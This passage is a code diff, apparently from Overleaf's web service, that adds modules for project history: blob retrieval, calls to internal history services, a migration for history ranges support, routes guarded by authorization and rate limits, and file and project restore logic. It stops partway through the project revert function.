function getChanges(req, res, next) { + const projectId = req.params.project_id + const since = req.query.since + const changes = await HistoryManager.promises.getChanges(projectId, { since }) + res.json(changes) +} + +function isPrematureClose(err) { + return ( + err instanceof Error && + 'code' in err && + err.code === 'ERR_STREAM_PREMATURE_CLOSE' + ) +} + +module.exports = { + getBlob: expressify(getBlob), + headBlob: expressify(headBlob), + proxyToHistoryApi: expressify(proxyToHistoryApi), + proxyToHistoryApiAndInjectUserDetails: expressify( + proxyToHistoryApiAndInjectUserDetails + ), + resyncProjectHistory: expressify(resyncProjectHistory), + restoreFileFromV2: expressify(restoreFileFromV2), + revertFile: expressify(revertFile), + revertProject: expressify(revertProject), + getLabels: expressify(getLabels), + createLabel: expressify(createLabel), + deleteLabel: expressify(deleteLabel), + downloadZipOfVersion: expressify(downloadZipOfVersion), + getLatestHistory: expressify(getLatestHistory), + getChanges: expressify(getChanges), + _displayNameForUser, + promises: { + _pipeHistoryZipToResponse, + }, +} diff --git a/services/web/app/src/Features/History/HistoryManager.js b/services/web/app/src/Features/History/HistoryManager.js new file mode 100644 index 0000000..6e40907 --- /dev/null +++ b/services/web/app/src/Features/History/HistoryManager.js @@ -0,0 +1,450 @@ +const { callbackify } = require('util') +const { + fetchJson, + fetchNothing, + fetchStreamWithResponse, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const fs = require('fs') +const settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') +const UserGetter = require('../User/UserGetter') +const ProjectGetter = require('../Project/ProjectGetter') +const HistoryBackupDeletionHandler = require('./HistoryBackupDeletionHandler') +const { db, ObjectId } = require('../../infrastructure/mongodb') +const Metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const { NotFoundError } = require('../Errors/Errors') +const projectKey = require('./project_key') + +// BEGIN copy from services/history-v1/storage/lib/blob_store/index.js + +const GLOBAL_BLOBS = new Set() // CHANGE FROM SOURCE: only store hashes. + +const HISTORY_V1_URL = settings.apis.v1_history.url +const HISTORY_V1_BASIC_AUTH = { + user: settings.apis.v1_history.user, + password: settings.apis.v1_history.pass, +} + +function makeGlobalKey(hash) { + return `${hash.slice(0, 2)}/${hash.slice(2, 4)}/${hash.slice(4)}` +} + +function makeProjectKey(projectId, hash) { + return `${projectKey.format(projectId)}/${hash.slice(0, 2)}/${hash.slice(2)}` +} + +function getBlobLocation(projectId, hash) { + if (GLOBAL_BLOBS.has(hash)) { + return { + bucket: settings.apis.v1_history.buckets.globalBlobs, + key: makeGlobalKey(hash), + } + } else { + return { + bucket: settings.apis.v1_history.buckets.projectBlobs, + key: makeProjectKey(projectId, hash), + } + } +} + +async function loadGlobalBlobs() { + const blobs = db.projectHistoryGlobalBlobs.find() + for await (const blob of blobs) { + GLOBAL_BLOBS.add(blob._id) // CHANGE FROM SOURCE: only store hashes. + } +} + +// END copy from services/history-v1/storage/lib/blob_store/index.js + +async function initializeProject(projectId) { + const body = await fetchJson(`${settings.apis.project_history.url}/project`, { + method: 'POST', + json: { historyId: projectId.toString() }, + }) + const historyId = body && body.project && body.project.id + if (!historyId) { + throw new OError('project-history did not provide an id', { body }) + } + return historyId +} + +async function flushProject(projectId) { + try { + await fetchNothing( + `${settings.apis.project_history.url}/project/${projectId}/flush`, + { method: 'POST' } + ) + } catch (err) { + throw OError.tag(err, 'failed to flush project to project history', { + projectId, + }) + } +} + +async function deleteProjectHistory(projectId) { + try { + await fetchNothing( + `${settings.apis.project_history.url}/project/${projectId}`, + { method: 'DELETE' } + ) + } catch (err) { + throw OError.tag(err, 'failed to delete project history', { + projectId, + }) + } +} + +async function resyncProject(projectId, options = {}) { + const body = {} + if (options.force) { + body.force = options.force + } + if (options.origin) { + body.origin = options.origin + } + if (options.historyRangesMigration) { + body.historyRangesMigration = options.historyRangesMigration + } + try { + await fetchNothing( + `${settings.apis.project_history.url}/project/${projectId}/resync`, + { + method: 'POST', + json: body, + signal: AbortSignal.timeout(6 * 60 * 1000), + } + ) + } catch (err) { + throw OError.tag(err, 'failed to resync project history', { + projectId, + }) + } +} + +async function deleteProject(projectId, historyId) { + const tasks = [] + tasks.push(_deleteProjectInProjectHistory(projectId)) + if (historyId != null) { + tasks.push(_deleteProjectInFullProjectHistory(historyId)) + } + await Promise.all(tasks) + await HistoryBackupDeletionHandler.deleteProject(projectId) +} + +async function _deleteProjectInProjectHistory(projectId) { + try { + await fetchNothing( + `${settings.apis.project_history.url}/project/${projectId}`, + { method: 'DELETE' } + ) + } catch (err) { + throw OError.tag( + err, + 'failed to clear project history in project-history', + { projectId } + ) + } +} + +async function _deleteProjectInFullProjectHistory(historyId) { + try { + await fetchNothing(`${HISTORY_V1_URL}/projects/${historyId}`, { + method: 'DELETE', + basicAuth: HISTORY_V1_BASIC_AUTH, + }) + } catch (err) { + throw OError.tag(err, 'failed to clear project history', { historyId }) + } +} + +async function uploadBlobFromDisk(historyId, hash, byteLength, fsPath) { + const outStream = fs.createReadStream(fsPath) + + const url = `${HISTORY_V1_URL}/projects/${historyId}/blobs/${hash}` + await fetchNothing(url, { + method: 'PUT', + body: outStream, + headers: { 'Content-Length': byteLength }, // add the content length to work around problems with chunked encoding in node 18 + signal: AbortSignal.timeout(60 * 1000), + basicAuth: HISTORY_V1_BASIC_AUTH, + }) +} + +async function copyBlob(sourceHistoryId, targetHistoryId, hash) { + const url = `${HISTORY_V1_URL}/projects/${targetHistoryId}/blobs/${hash}` + await fetchNothing( + `${url}?${new URLSearchParams({ copyFrom: sourceHistoryId })}`, + { + method: 'POST', + basicAuth: HISTORY_V1_BASIC_AUTH, + } + ) +} + +async function requestBlobWithFallback( + projectId, + hash, + fileId, + method = 'GET', + range = '' +) { + const project = await ProjectGetter.promises.getProject(projectId, { + 'overleaf.history.id': true, + }) + // Talk to history-v1 directly to avoid streaming via project-history. + let url = new URL(HISTORY_V1_URL) + url.pathname += `/projects/${project.overleaf.history.id}/blobs/${hash}` + + const opts = { method, headers: { Range: range } } + let stream, response, source + try { + ;({ stream, response } = await fetchStreamWithResponse(url, { + ...opts, + basicAuth: { + user: settings.apis.v1_history.user, + password: settings.apis.v1_history.pass, + }, + })) + source = 'history-v1' + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + if (ObjectId.isValid(fileId)) { + url = new URL(settings.apis.filestore.url) + url.pathname = `/project/${projectId}/file/${fileId}` + try { + ;({ stream, response } = await fetchStreamWithResponse(url, opts)) + } catch (err) { + if ( + err instanceof RequestFailedError && + err.response.status === 404 + ) { + throw new NotFoundError() + } + throw err + } + logger.warn({ projectId, hash, fileId }, 'missing history blob') + source = 'filestore' + } else { + throw new NotFoundError() + } + } else { + throw err + } + } + Metrics.inc('request_blob', 1, { path: source }) + return { + url, + stream, + source, + contentLength: response.headers.get('Content-Length'), + } +} + +/** + * Warning: Don't use this method for large projects. It will eagerly load all + * the history data and apply all operations. + * @param {string} projectId + * @returns Promise<object> + */ +async function getCurrentContent(projectId) { + const historyId = await getHistoryId(projectId) + + try { + return await fetchJson( + `${HISTORY_V1_URL}/projects/${historyId}/latest/content`, + { + method: 'GET', + basicAuth: HISTORY_V1_BASIC_AUTH, + } + ) + } catch (err) { + throw OError.tag(err, 'failed to load project history', { historyId }) + } +} + +/** + * Warning: Don't use this method for large projects. It will eagerly load all + * the history data and apply all operations. + * @param {string} projectId + * @param {number} version + * + * @returns Promise<object> + */ +async function getContentAtVersion(projectId, version) { + const historyId = await getHistoryId(projectId) + + try { + return await fetchJson( + `${HISTORY_V1_URL}/projects/${historyId}/versions/${version}/content`, + { + method: 'GET', + basicAuth: HISTORY_V1_BASIC_AUTH, + } + ) + } catch (err) { + throw OError.tag( + err, + 'failed to load project history snapshot at version', + { historyId, version } + ) + } +} + +/** + * Get the latest chunk from history + * + * @param {string} projectId + */ +async function getLatestHistory(projectId) { + const historyId = await getHistoryId(projectId) + + return await fetchJson( + `${HISTORY_V1_URL}/projects/${historyId}/latest/history`, + { + basicAuth: HISTORY_V1_BASIC_AUTH, + } + ) +} + +/** + * Get history changes since a given version + * + * @param {string} projectId + * @param {object} opts + * @param {number} opts.since - The start version of changes to get + */ +async function getChanges(projectId, opts = {}) { + const historyId = await getHistoryId(projectId) + + const url = new URL(`${HISTORY_V1_URL}/projects/${historyId}/changes`) + if (opts.since) { + url.searchParams.set('since', opts.since) + } + + return await fetchJson(url, { + basicAuth: HISTORY_V1_BASIC_AUTH, + }) +} + +async function getHistoryId(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + overleaf: true, + }) + const historyId = project?.overleaf?.history?.id + if (!historyId) { + throw new OError('project does not have a history id', { projectId }) + } + return historyId +} + +async function injectUserDetails(data) { + // data can be either: + // { + // diff: [{ + // i: "foo", + // meta: { + // users: ["user_id", v1_user_id, ...] + // ... + // } + // }, ...] + // } + // or + // { + // updates: [{ + // pathnames: ["main.tex"] + // meta: { + // users: ["user_id", v1_user_id, ...] + // ... + // }, + // ... + // }, ...] + // } + // Either way, the top level key points to an array of objects with a meta.users property + // that we need to replace user_ids with populated user objects. + // Note that some entries in the users arrays may be v1 ids returned by the v1 history + // service. v1 ids will be `numbers` + let userIds = new Set() + let v1UserIds = new Set() + const entries = Array.isArray(data.diff) + ? data.diff + : Array.isArray(data.updates) + ? data.updates + : [] + for (const entry of entries) { + for (const user of (entry.meta && entry.meta.users) || []) { + if (typeof user === 'string') { + userIds.add(user) + } else if (typeof user === 'number') { + v1UserIds.add(user) + } + } + } + + userIds = Array.from(userIds) + v1UserIds = Array.from(v1UserIds) + const projection = { first_name: 1, last_name: 1, email: 1 } + const usersArray = await UserGetter.promises.getUsers(userIds, projection) + const users = {} + for (const user of usersArray) { + users[user._id.toString()] = _userView(user) + } + projection.overleaf = 1 + const v1IdentifiedUsersArray = await UserGetter.promises.getUsersByV1Ids( + v1UserIds, + projection + ) + for (const user of v1IdentifiedUsersArray) { + users[user.overleaf.id] = _userView(user) + } + for (const entry of entries) { + if (entry.meta != null) { + entry.meta.users = ((entry.meta && entry.meta.users) || []).map(user => { + if (typeof user === 'string' || typeof user === 'number') { + return users[user] + } else { + return user + } + }) + } + } + return data +} + +function _userView(user) { + const { _id, first_name: firstName, last_name: lastName, email } = user + return { first_name: firstName, last_name: lastName, email, id: _id } +} + +module.exports = { + getBlobLocation, + initializeProject: callbackify(initializeProject), + flushProject: callbackify(flushProject), + resyncProject: callbackify(resyncProject), + deleteProject: callbackify(deleteProject), + deleteProjectHistory: callbackify(deleteProjectHistory), + injectUserDetails: callbackify(injectUserDetails), + getCurrentContent: callbackify(getCurrentContent), + uploadBlobFromDisk: callbackify(uploadBlobFromDisk), + copyBlob: callbackify(copyBlob), + requestBlobWithFallback: callbackify(requestBlobWithFallback), + getLatestHistory: callbackify(getLatestHistory), + getChanges: callbackify(getChanges), + promises: { + loadGlobalBlobs, + initializeProject, + flushProject, + resyncProject, + deleteProject, + injectUserDetails, + deleteProjectHistory, + getCurrentContent, + getContentAtVersion, + uploadBlobFromDisk, + copyBlob, + requestBlobWithFallback, + getLatestHistory, + getChanges, + }, +} diff --git a/services/web/app/src/Features/History/HistoryRangesSupportMigration.mjs b/services/web/app/src/Features/History/HistoryRangesSupportMigration.mjs new file mode 100644 index 0000000..e76267a --- /dev/null +++ b/services/web/app/src/Features/History/HistoryRangesSupportMigration.mjs @@ -0,0 +1,272 @@ +// @ts-check + +import { callbackify } from 'node:util' +import OError from '@overleaf/o-error' +import logger from '@overleaf/logger' +import HistoryManager from '../History/HistoryManager.js' +import DocumentUpdaterHandler from '../DocumentUpdater/DocumentUpdaterHandler.js' +import DocstoreManager from '../Docstore/DocstoreManager.js' +import ProjectOptionsHandler from '../Project/ProjectOptionsHandler.js' +import mongodb from '../../infrastructure/mongodb.js' + +const { db, ObjectId, READ_PREFERENCE_SECONDARY } = mongodb + +/** + * Migrate projects based on a query. + * + * @param {object} opts + * @param {string[]} [opts.projectIds] + * @param {string[]} [opts.ownerIds] + * @param {string} [opts.minId] + * @param {string} [opts.maxId] + * @param {number} [opts.maxCount] + * @param {"forwards" | "backwards"} [opts.direction] + * @param {boolean} [opts.force] + * @param {boolean} [opts.stopOnError] + * @param {boolean} [opts.quickOnly] + * @param {number} [opts.concurrency] + */ +async function migrateProjects(opts = {}) { + const { + ownerIds, + projectIds, + minId, + maxId, + maxCount = Infinity, + direction = 'forwards', + force = false, + stopOnError = false, + quickOnly = false, + concurrency = 1, + } = opts + + const clauses = [] + + // skip projects that don't have full project history + clauses.push({ 'overleaf.history.id': { $exists: true } }) + + if (projectIds != null) { + clauses.push({ _id: { $in: projectIds.map(id => new ObjectId(id)) } }) + } + if (ownerIds != null) { + clauses.push({ owner_ref: { $in: ownerIds.map(id => new ObjectId(id)) } }) + } + if (minId) { + clauses.push({ _id: { $gte: new ObjectId(minId) } }) + } + if (maxId) { + clauses.push({ _id: { $lte: new ObjectId(maxId) } }) + } + + const filter = {} + if (clauses.length > 0) { + filter.$and = clauses + } + + const projects = db.projects + .find(filter, { + readPreference: READ_PREFERENCE_SECONDARY, + projection: { _id: 1, overleaf: 1 }, + }) + .sort({ _id: -1 }) + + let terminating = false + const handleSignal = signal => { + logger.info({ signal }, 'History ranges support migration received signal') + terminating = true + } + process.on('SIGINT', handleSignal) + process.on('SIGTERM', handleSignal) + + const projectsProcessed = { + quick: 0, + skipped: 0, + resync: 0, + total: 0, + } + const jobsByProjectId = new Map() + let errors = 0 + + for await (const project of projects) { + if (projectsProcessed.total >= maxCount) { + break + } + + if (errors > 0 && stopOnError) { + break + } + + if (terminating) { + break + } + + const projectId = project._id.toString() + + if (!force) { + // Skip projects that are already migrated + if ( + (direction === 'forwards' && + project.overleaf.history.rangesSupportEnabled) || + (direction === 'backwards' && + !project.overleaf.history.rangesSupportEnabled) + ) { + continue + } + } + + if (jobsByProjectId.size >= concurrency) { + // Wait until the next job finishes + await Promise.race(jobsByProjectId.values()) + } + + const job = processProject(projectId, direction, quickOnly) + .then(info => { + jobsByProjectId.delete(projectId) + projectsProcessed[info.migrationType] += 1 + projectsProcessed.total += 1 + logger.debug( + { + projectId, + direction, + projectsProcessed, + errors, + ...info, + }, + 'History ranges support migration' + ) + if (projectsProcessed.total % 10000 === 0) { + logger.info( + { projectsProcessed, errors, lastProjectId: projectId }, + 'History ranges support migration progress' + ) + } + }) + .catch(err => { + jobsByProjectId.delete(projectId) + errors += 1 + logger.error( + { err, projectId, direction, projectsProcessed, errors }, + 'Failed to migrate history ranges support' + ) + }) + + jobsByProjectId.set(projectId, job) + } + + // Let the last jobs finish + await Promise.all(jobsByProjectId.values()) +} + +/** + * Migrate a single project + * + * @param {string} projectId + * @param {"forwards" | "backwards"} direction + * @param {boolean} quickOnly + */ +async function processProject(projectId, direction, quickOnly) { + const startTimeMs = Date.now() + const quickMigrationSuccess = await quickMigration(projectId, direction) + let migrationType + if (quickMigrationSuccess) { + migrationType = 'quick' + } else if (quickOnly) { + migrationType = 'skipped' + } else { + await migrateProject(projectId, direction) + migrationType = 'resync' + } + const elapsedMs = Date.now() - startTimeMs + return { migrationType, elapsedMs } +} + +/** + * Attempt a quick migration (without resync) + * + * @param {string} projectId + * @param {"forwards" | "backwards"} direction + * @return {Promise<boolean>} whether or not the quick migration was a success + */ +async function quickMigration(projectId, direction = 'forwards') { + const blockSuccess = + await DocumentUpdaterHandler.promises.blockProject(projectId) + if (!blockSuccess) { + return false + } + + let projectHasRanges + try { + projectHasRanges = + await DocstoreManager.promises.projectHasRanges(projectId) + } catch (err) { + // Docstore request probably timed out. Assume the project has ranges + logger.warn( + { err, projectId }, + 'Failed to check if project has ranges; proceeding with a resync migration' + ) + projectHasRanges = true + } + if (projectHasRanges) { + await DocumentUpdaterHandler.promises.unblockProject(projectId) + return false + } + + try { + await ProjectOptionsHandler.promises.setHistoryRangesSupport( + projectId, + direction === 'forwards' + ) + } catch (err) { + await DocumentUpdaterHandler.promises.unblockProject(projectId) + await hardResyncProject(projectId) + throw err + } + + let wasBlocked + try { + wasBlocked = await DocumentUpdaterHandler.promises.unblockProject(projectId) + } catch (err) { + await hardResyncProject(projectId) + throw err + } + if (!wasBlocked) { + await hardResyncProject(projectId) + throw new OError('Tried to unblock project but it was not blocked', { + projectId, + }) + } + + return true +} + +/** + * Migrate a single project + * + * @param {string} projectId + * @param {"forwards" | "backwards"} direction + */ +async function migrateProject(projectId, direction = 'forwards') { + await HistoryManager.promises.flushProject(projectId) + await HistoryManager.promises.resyncProject(projectId, { + historyRangesMigration: direction, + }) +} + +/** + * Hard resync a project + * + * This is used when something goes wrong with the quick migration after we've + * changed the history ranges support flag on a project. + * + * @param {string} projectId + */ +async function hardResyncProject(projectId) { + await HistoryManager.promises.flushProject(projectId) + await HistoryManager.promises.resyncProject(projectId, { force: true }) +} + +export default { + migrateProjects: callbackify(migrateProjects), + migrateProject: callbackify(migrateProject), + promises: { migrateProjects, migrateProject }, +} diff --git a/services/web/app/src/Features/History/HistoryRouter.mjs b/services/web/app/src/Features/History/HistoryRouter.mjs new file mode 100644 index 0000000..d5c7b46 --- /dev/null +++ b/services/web/app/src/Features/History/HistoryRouter.mjs @@ -0,0 +1,179 @@ +// @ts-check + +import Settings from '@overleaf/settings' +import { Joi, validate } from '../../infrastructure/Validation.js' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import HistoryController from './HistoryController.js' + +const rateLimiters = { + downloadProjectRevision: new RateLimiter('download-project-revision', { + points: 30, + duration: 60 * 60, + }), + getProjectBlob: new RateLimiter('get-project-blob', { + // Download project in full once per hour + points: Settings.maxEntitiesPerProject, + duration: 60 * 60, + }), + flushHistory: new RateLimiter('flush-project-history', { + points: 30, + duration: 60, + }), +} + +function apply(webRouter, privateApiRouter) { + // Blobs + + webRouter.head( + '/project/:project_id/blob/:hash', + validate({ + params: Joi.object({ + project_id: Joi.objectId().required(), + hash: Joi.string().required().hex().length(40), + }), + query: Joi.object({ + fallback: Joi.objectId().optional(), + }), + }), + RateLimiterMiddleware.rateLimit(rateLimiters.getProjectBlob), + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.headBlob + ) + webRouter.get( + '/project/:project_id/blob/:hash', + validate({ + params: Joi.object({ + project_id: Joi.objectId().required(), + hash: Joi.string().required().hex().length(40), + }), + query: Joi.object({ + fallback: Joi.objectId().optional(), + }), + }), + RateLimiterMiddleware.rateLimit(rateLimiters.getProjectBlob), + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.getBlob + ) + + // History diffs + + webRouter.get( + '/project/:Project_id/updates', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.proxyToHistoryApiAndInjectUserDetails + ) + webRouter.get( + '/project/:Project_id/doc/:doc_id/diff', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.proxyToHistoryApi + ) + webRouter.get( + '/project/:Project_id/diff', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.proxyToHistoryApiAndInjectUserDetails + ) + webRouter.get( + '/project/:Project_id/filetree/diff', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.proxyToHistoryApi + ) + + // File and project restore + + webRouter.post( + '/project/:project_id/restore_file', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + HistoryController.restoreFileFromV2 + ) + webRouter.post( + '/project/:project_id/revert_file', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + HistoryController.revertFile + ) + webRouter.post( + '/project/:project_id/revert-project', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + HistoryController.revertProject + ) + + // History download + + webRouter.get( + '/project/:project_id/version/:version/zip', + RateLimiterMiddleware.rateLimit(rateLimiters.downloadProjectRevision), + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.downloadZipOfVersion + ) + + // History flush and resync + + webRouter.post( + '/project/:Project_id/flush', + RateLimiterMiddleware.rateLimit(rateLimiters.flushHistory), + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.proxyToHistoryApi + ) + privateApiRouter.post( + '/project/:Project_id/history/resync', + AuthenticationController.requirePrivateApiAuth(), + HistoryController.resyncProjectHistory + ) + + // History labels + + webRouter.get( + '/project/:Project_id/labels', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.getLabels + ) + webRouter.post( + '/project/:Project_id/labels', + AuthorizationMiddleware.ensureUserCanWriteOrReviewProjectContent, + HistoryController.createLabel + ) + webRouter.delete( + '/project/:Project_id/labels/:label_id', + AuthorizationMiddleware.ensureUserCanWriteOrReviewProjectContent, + HistoryController.deleteLabel + ) + + // History snapshot + + webRouter.get( + '/project/:project_id/latest/history', + validate({ + params: Joi.object({ + project_id: Joi.objectId().required(), + }), + }), + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.getLatestHistory + ) + webRouter.get( + '/project/:project_id/changes', + validate({ + params: Joi.object({ + project_id: Joi.objectId().required(), + }), + query: Joi.object({ + since: Joi.number().integer().min(0).optional(), + }), + }), + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.getChanges + ) +} + +export default { apply } diff --git a/services/web/app/src/Features/History/HistoryURLHelper.js b/services/web/app/src/Features/History/HistoryURLHelper.js new file mode 100644 index 0000000..8b8d8cb --- /dev/null +++ b/services/web/app/src/Features/History/HistoryURLHelper.js @@ -0,0 +1,21 @@ +// Pass settings to enable consistent unit tests from .js and .mjs modules +function projectHistoryURLWithFilestoreFallback( + Settings, + projectId, + historyId, + fileRef, + origin +) { + const filestoreURL = `${Settings.apis.filestore.url}/project/${projectId}/file/${fileRef._id}?from=${origin}` + // TODO: When this file is converted to ES modules we will be able to use Features.hasFeature('project-history-blobs'). Currently we can't stub the feature return value in tests. + if (fileRef.hash && Settings.enableProjectHistoryBlobs) { + return { + url: `${Settings.apis.project_history.url}/project/${historyId}/blob/${fileRef.hash}`, + fallbackURL: filestoreURL, + } + } else { + return { url: filestoreURL } + } +} + +module.exports = { projectHistoryURLWithFilestoreFallback } diff --git a/services/web/app/src/Features/History/RestoreManager.js b/services/web/app/src/Features/History/RestoreManager.js new file mode 100644 index 0000000..8c73695 --- /dev/null +++ b/services/web/app/src/Features/History/RestoreManager.js @@ -0,0 +1,388 @@ +const Settings = require('@overleaf/settings') +const Path = require('path') +const FileWriter = require('../../infrastructure/FileWriter') +const FileSystemImportManager = require('../Uploads/FileSystemImportManager') +const EditorController = require('../Editor/EditorController') +const Errors = require('../Errors/Errors') +const moment = require('moment') +const { callbackifyAll } = require('@overleaf/promise-utils') +const { fetchJson } = require('@overleaf/fetch-utils') +const ProjectLocator = require('../Project/ProjectLocator') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const ChatApiHandler = require('../Chat/ChatApiHandler') +const DocstoreManager = require('../Docstore/DocstoreManager') +const logger = require('@overleaf/logger') +const EditorRealTimeController = require('../Editor/EditorRealTimeController') +const ChatManager = require('../Chat/ChatManager') +const OError = require('@overleaf/o-error') +const ProjectGetter = require('../Project/ProjectGetter') +const ProjectEntityHandler = require('../Project/ProjectEntityHandler') + +const RestoreManager = { + async restoreFileFromV2(userId, projectId, version, pathname) { + const fsPath = await RestoreManager._writeFileVersionToDisk( + projectId, + version, + pathname + ) + const basename = Path.basename(pathname) + let dirname = Path.dirname(pathname) + if (dirname === '.') { + // no directory + dirname = '' + } + const parentFolderId = await RestoreManager._findOrCreateFolder( + projectId, + dirname, + userId + ) + const addEntityWithName = async name => + await FileSystemImportManager.promises.addEntity( + userId, + projectId, + parentFolderId, + name, + fsPath, + false + ) + return await RestoreManager._addEntityWithUniqueName( + addEntityWithName, + basename + ) + }, + + async revertFile(userId, projectId, version, pathname, options = {}) { + const project = await ProjectGetter.promises.getProject(projectId, { + overleaf: true, + }) + if (!project?.overleaf?.history?.rangesSupportEnabled) { + throw new OError('project does not have ranges support', { projectId }) + } + + const fsPath = await RestoreManager._writeFileVersionToDisk( + projectId, + version, + pathname + ) + const basename = Path.basename(pathname) + let dirname = Path.dirname(pathname) + if (dirname === '.') { + // root directory + dirname = '/' + } + const parentFolderId = await RestoreManager._findOrCreateFolder( + projectId, + dirname, + userId + ) + const file = await ProjectLocator.promises + .findElementByPath({ + project_id: projectId, + path: pathname, + }) + .catch(() => null) + + const updates = await RestoreManager._getUpdatesFromHistory( + projectId, + version + ) + const updateAtVersion = updates.find(update => update.toV === version) + + const origin = options.origin || { + kind: 'file-restore', + path: pathname, + version, + timestamp: new Date(updateAtVersion.meta.end_ts).toISOString(), + } + + const importInfo = await FileSystemImportManager.promises.importFile( + fsPath, + pathname + ) + + if (file) { + if (file.type !== 'doc' && file.type !== 'file') { + throw new OError('unexpected file type', { type: file.type }) + } + logger.debug( + { projectId, fileId: file.element._id, type: importInfo.type }, + 'deleting entity before reverting it' + ) + await EditorController.promises.deleteEntity( + projectId, + file.element._id, + file.type, + origin, + userId + ) + } + + const { metadata } = await RestoreManager._getMetadataFromHistory( + projectId, + version, + pathname + ) + + // Look for metadata indicating a linked file. + const isFileMetadata = metadata && 'provider' in metadata + + logger.debug({ metadata }, 'metadata from history') + + if (importInfo.type === 'file' || isFileMetadata) { + const newFile = await EditorController.promises.upsertFile( + projectId, + parentFolderId, + basename, + fsPath, + metadata, + origin, + userId + ) + + return { + _id: newFile._id, + type: 'file', + } + } + + const ranges = await RestoreManager._getRangesFromHistory( + projectId, + version, + pathname + ) + + const documentCommentIds = new Set( + ranges.comments?.map(({ op: { t } }) => t) + ) + + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + + const docsWithRanges = + await DocstoreManager.promises.getAllRanges(projectId) + + const nonOrphanedThreadIds = new Set() + for (const { ranges } of docsWithRanges) { + for (const comment of ranges.comments ?? []) { + nonOrphanedThreadIds.add(comment.op.t) + } + } + + const commentIdsToDuplicate = Array.from(documentCommentIds).filter(id => + nonOrphanedThreadIds.has(id) + ) + + const newRanges = { changes: ranges.changes, comments: [] } + + if (commentIdsToDuplicate.length > 0) { + const { newThreads: newCommentIds } = + await ChatApiHandler.promises.duplicateCommentThreads( + projectId, + commentIdsToDuplicate + ) + + logger.debug({ mapping: newCommentIds }, 'replacing comment threads') + + for (const comment of ranges.comments ?? []) { + if (Object.prototype.hasOwnProperty.call(newCommentIds, comment.op.t)) { + const result = newCommentIds[comment.op.t] + if (result.error) { + // We couldn't duplicate the thread, so we need to delete it from + // the resulting ranges. + continue + } + // We have a new id for this comment thread + comment.op.t = result.duplicateId + } + newRanges.comments.push(comment) + } + } else { + newRanges.comments = ranges.comments + } + + const newCommentThreadData = + await ChatApiHandler.promises.generateThreadData( + projectId, + newRanges.comments.map(({ op: { t } }) => t) + ) + + // Resolve/reopen threads in chat service to match what is in history + for (const commentRange of newRanges.comments) { + const threadData = newCommentThreadData[commentRange.op.t] + if (!threadData) { + // comment thread was deleted + continue + } + + if (commentRange.op.resolved && threadData.resolved == null) { + // The history snapshot stores the comment's resolved property as a boolean, + // but it does not include information about who resolved the comment or the timestamp. + // Until this is fixed, we will resolve the thread with the current user and the current timestamp. + await ChatApiHandler.promises.resolveThread( + projectId, + commentRange.op.t, + userId + ) + threadData.resolved = true + threadData.resolved_by_user_id = userId + threadData.resolved_at = new Date().toISOString() + } else if (!commentRange.op.resolved && threadData.resolved != null) { + await ChatApiHandler.promises.reopenThread(projectId, commentRange.op.t) + delete threadData.resolved + delete threadData.resolved_by_user_id + delete threadData.resolved_at + } + // remove the resolved property from the comment range as the chat service is synced at this point + delete commentRange.op.resolved + } + + await ChatManager.promises.injectUserInfoIntoThreads(newCommentThreadData) + + // Only keep restored comment ranges that point to a valid thread. + // The chat service won't have generated thread data for deleted threads. + newRanges.comments = newRanges.comments.filter( + comment => newCommentThreadData[comment.op.t] != null + ) + + logger.debug({ newCommentThreadData }, 'emitting new comment threads') + EditorRealTimeController.emitToRoom( + projectId, + 'new-comment-threads', + newCommentThreadData + ) + + const { _id } = await EditorController.promises.addDocWithRanges( + projectId, + parentFolderId, + basename, + importInfo.lines, + newRanges, + origin, + userId + ) + + return { + _id, + type: importInfo.type, + } + }, + + async _findOrCreateFolder(projectId, dirname, userId) { + const { lastFolder } = await EditorController.promises.mkdirp( + projectId, + dirname, + userId + ) + return lastFolder?._id + }, + + async _addEntityWithUniqueName(addEntityWithName, basename) { + try { + return await addEntityWithName(basename) + } catch (error) { + if (error instanceof Errors.DuplicateNameError) { + // Duplicate name, so try with a prefix + const date = moment(new Date()).format('Do MMM YY H:mm:ss') + // Move extension to the end so the file type is preserved + const extension = Path.extname(basename) + basename = Path.basename(basename, extension) + basename = `${basename} (Restored on ${date})` + if (extension !== '') { + basename = `${basename}${extension}` + } + return await addEntityWithName(basename) + } else { + throw error + } + } + }, + + async revertProject(userId, projectId, version) { + const project = await ProjectGetter.promises.getProject(projectId, { + overleaf: true, + }) + if (!project?.overleaf?.history?.rangesSupportEnabled) { + throw new OError('project does not have ranges support', { projectId }) + } + + // Get project paths at version + const pathsAtPastVersion = await RestoreManager._getProjectPathsAtVersion( + projectId, + version + ) + + const updates = await RestoreManager._getUpdatesFromHistory( + projectId, + version + ) + const updateAtVersion = updates.find(update => update.toV === version) + + const origin = { + kind: 'project-restore', + version, + timestamp: new 